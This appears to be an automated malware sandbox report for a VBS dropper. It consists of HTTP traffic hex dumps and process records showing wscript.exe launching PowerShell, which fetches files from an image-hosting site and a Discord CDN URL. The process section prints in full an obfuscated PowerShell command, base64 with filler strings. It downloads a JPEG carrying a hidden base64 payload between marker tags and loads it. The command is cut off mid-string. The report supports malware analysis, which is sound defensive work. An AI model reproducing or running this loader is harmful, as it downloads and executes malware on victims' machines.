                2024-05-23 16:32:46 UTC1369INData Raw: a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48
                Data Ascii: mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH
                2024-05-23 16:32:46 UTC1369INData Raw: f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16
                Data Ascii: #K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.749709188.114.97.34431988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:32:50 UTC100OUTGET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                Host: uploaddeimagens.com.br
                2024-05-23 16:32:50 UTC692INHTTP/1.1 200 OK
                Date: Thu, 23 May 2024 16:32:50 GMT
                Content-Type: image/jpeg
                Content-Length: 4198361
                Connection: close
                Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                ETag: "6627c3ad-400fd9"
                Cache-Control: max-age=2678400
                CF-Cache-Status: HIT
                Age: 373
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cPCNlGCQyEEDlg2pyZh5iOJ8b4zuhvEbTUWWshTqbagBYTFmk2GjInHUyS1EbBy1NXZ%2BMRsMPXLmgvxSm3j5qhXTt5kQ1gFMLP3MfgdpmzajGHWFDYSWoi0v1g%2F41tBqJ61dZMFxYca"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 888671bccf3c41b4-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:32:50 UTC677INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                2024-05-23 16:32:50 UTC1369INData Raw: 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2
                Data Ascii: TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.
                2024-05-23 16:32:50 UTC1369INData Raw: 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31
                Data Ascii: Ay2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1
                2024-05-23 16:32:50 UTC1369INData Raw: fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19
                Data Ascii: r7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(h
                2024-05-23 16:32:50 UTC1369INData Raw: c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8
                Data Ascii: HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}
                2024-05-23 16:32:50 UTC1369INData Raw: cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64
                Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd
                2024-05-23 16:32:50 UTC1369INData Raw: fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1
                Data Ascii: f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                2024-05-23 16:32:50 UTC1369INData Raw: 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05
                Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
                2024-05-23 16:32:50 UTC1369INData Raw: 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8
                Data Ascii: nq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5
                2024-05-23 16:32:50 UTC1369INData Raw: 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd
                Data Ascii: K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.749710162.159.130.2334431988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:32:59 UTC221OUTGET /attachments/1235627023511191643/1235641275026243685/file.txt?ex=66351c1d&is=6633ca9d&hm=6898bd52837c3e8ebc99a889b4ac7fa8c5b601c4722aec2608343a1d6e3e0eeb& HTTP/1.1
                Host: cdn.discordapp.com
                Connection: Keep-Alive
                2024-05-23 16:32:59 UTC1043INHTTP/1.1 404 Not Found
                Date: Thu, 23 May 2024 16:32:59 GMT
                Content-Type: text/plain;charset=UTF-8
                Content-Length: 36
                Connection: close
                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                Set-Cookie: __cf_bm=bJVpYKzXsR3lzJOYftuD26pD.X0B9PC18kiZ2MBBgPg-1716481979-1.0.1.1-VkTqXMY5ub9aiUYx0kUOPXpZrXJEnoRTFHdyQDVw8hCkcsMcv2Lpih2yeFvIxyo32Q9bB8WiwEG.i8ISa8JMhg; path=/; expires=Thu, 23-May-24 17:02:59 GMT; domain=.discordapp.com; HttpOnly; Secure
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjxpXkM%2BjFcXTp6FGJKPwdEk4TwMvuB8vAE8H2Xga0NCqatxp5857Bi3iu2wYuqqXB8bmmy1kNT6BVIYFwiCDpLyv3KY66s6nhW6tmE8E3kmq1vdBAllOc9CV8SGDSDUlm7sUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Set-Cookie: _cfuvid=oet8qoWqfiRZdQgqfsJb7vP8qGHbHkl.cmrVcxVxKkg-1716481979888-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 888671f63d3a4339-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:32:59 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                Data Ascii: This content is no longer available.


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:1
                Start time:12:32:22
                Start date:23/05/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
                Imagebase:0x7ff679ce0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:14
                Start time:12:32:42
                Start date:23/05/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgT